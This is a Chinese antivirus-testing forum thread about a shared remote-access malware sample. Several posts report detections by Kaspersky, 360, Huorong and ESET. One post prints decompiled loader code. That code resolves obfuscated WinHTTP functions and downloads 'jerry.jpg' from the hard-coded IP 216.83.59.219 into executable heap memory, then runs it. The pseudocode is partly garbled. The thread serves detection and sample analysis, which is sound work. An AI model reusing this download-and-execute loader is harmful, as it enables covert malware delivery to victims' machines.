远控

显示全部楼层 · 发表于 2024-4-13 19:21:46

文件后缀exe
360扫描双击miss

显示全部楼层 · 发表于 2024-4-13 19:41:06

本帖最后由 anxiety520 于 2024-4-13 20:35 编辑

卡巴
事件：我们发现入侵者可以使用一个应用程序来损坏您的计算机或个人数据。
组件：文件反病毒
结果描述：检测到
类型：可能造成伤害的软件
名称：VHO:HackTool.Win64.AmsiETWPatch.fn
精度：完全正确
威胁级别：中
对象类型：文件
对象名称：ac8889a871622480958b40ce8a69f2e1a00e3aaca66f4ea691c48e36fe7785f7.exe
原因：云保护

后来改报木马了
事件：检测到恶意对象
组件：文件反病毒
结果描述：检测到
类型：木马
名称：UDS:Trojan-Spy.Win32.Stealer
精度：完全正确
威胁级别：高
对象类型：文件
对象名称：ac8889a871622480958b40ce8a69f2e1a00e3aaca66f4ea691c48e36fe7785f7.exe
原因：云保护

显示全部楼层 · 发表于 2024-4-13 19:41:17

火绒
扫描&运行：MISS

显示全部楼层 · 发表于 2024-4-13 20:27:23

360扫描miss

显示全部楼层 · 发表于 2024-4-13 20:29:14

键盘记录

显示全部楼层 · 发表于 2024-4-13 20:40:18

ESET
Suspicious Object

显示全部楼层 · 发表于 2024-4-13 21:06:18

双击，无法顺利运行啊。

显示全部楼层 · 发表于 2024-4-13 21:16:17

显示全部楼层 · 发表于 2024-4-13 22:39:49

来个大手子打爆一下

reeConsole();
v18 = 0i64;
v37 = 0i64;
v24 = 0i64;
v28 = 0;
strcpy(LibFileName, "Winhttp.dll");
hModule = LoadLibraryA(LibFileName);
hHeap = HeapCreate(0x40000u, 0i64, 0i64);
v15 = (void (__cdecl *)())HeapAlloc(hHeap, 8u, 0x1000ui64);
strcpy(v17, "4lDKsW");
v3 = (__int64 (__fastcall *)(const wchar_t *, _QWORD, _QWORD, _QWORD, _DWORD))sub_140001000(&v26[3], 12i64, v17);
v18 = v3(L"Tor", 0i64, 0i64, 0i64, 0);
strcpy(v13, "TuntbA");
v4 = (__int64 (__fastcall *)(__int64, const wchar_t *, __int64, _QWORD))sub_140001000(v33, 15i64, v13);
LOWORD(v5) = 280;
v37 = v4(v18, L"216.83.59.219", v5, 0i64);
strcpy(v12, "2,");
strcpy(v36, "FKsbAX");
v6 = (__int64 (__fastcall *)(__int64, const wchar_t *, const wchar_t *, _QWORD, _QWORD, _QWORD, _DWORD))sub_140001000(v11, 19i64, v36);
v24 = v6(v37, L"GET", L"jerry.jpg", 0i64, 0i64, 0i64, 0);
C6");
v7 = (__int64 (__fastcall *)(__int64, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _QWORD))sub_140001000(v20, 19i64, v30);
v38 = v7(v24, 0i64, 0i64, 0i64, 0, 0, 0i64);
strcpy(v26, "'");
strcpy(v16, "LcuBpW");
v8 = (__int64 (__fastcall *)(__int64, _QWORD))sub_140001000(v25, 23i64, v16);
v38 = v8(v24, 0i64);
strcpy(v35, "eo5TSd");
qmemcpy(v10, "o/", 2);
strcpy(v29, "8Fbrxn");
qmemcpy(v19, "-3\r}$", 5);
strcpy(v14, "zZc5Pi");
v31 = 0i64;
v27 = 0i64;
v23 = 0i64;
while ( 1 )
{
v39[0] = 0;
if ( !v31 )
v31 = (void (__fastcall *)(__int64, int *))sub_140001000(v32, 26i64, v35);
v31(v24, v39);
if ( !v39[0] )
break;
memset(v40, 0, sizeof(v40));
if ( !v27 )
v27 = (void (__fastcall *)(__int64, char *, __int64, int *))sub_140001000(v10, 16i64, v29);
v27(v24, v40, 800i64, v39);
qmemcpy((char *)v15 + v28, v40, (unsigned int)v39[0]);
v28 += v39[0];
}
if ( !v23 )
v23 = (void (__fastcall *)(__int64))sub_140001000(v19, 19i64, v14);
v23(v24);
v23(v37);
v23(v18);
atexit(v15);
return 0;
}

复制代码

显示全部楼层 · 发表于 2024-4-13 23:38:12

[病毒样本] 远控

本帖子中包含更多资源

评分

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源